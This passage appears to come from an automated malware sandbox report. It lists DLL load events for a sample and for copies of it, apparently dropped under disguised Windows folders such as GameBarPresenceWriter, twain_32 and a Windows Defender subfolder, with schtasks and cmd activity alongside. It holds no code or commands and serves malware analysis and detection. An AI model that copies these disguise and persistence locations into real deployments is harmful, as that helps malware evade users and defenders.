                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: wpdshext.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exe Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
                    Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: winmmbase.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mmdevapi.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ksuser.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: avrt.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: audioses.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: midimap.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: mscoree.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: version.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: wldp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: amsi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: userenv.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: profapi.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\GameBarPresenceWriter\services.exeSection loaded: sspicli.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: mscoree.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: apphelp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: version.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: uxtheme.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: wldp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: amsi.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: userenv.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: profapi.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: windows.storage.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptsp.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: rsaenh.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeSection loaded: sspicli.dll
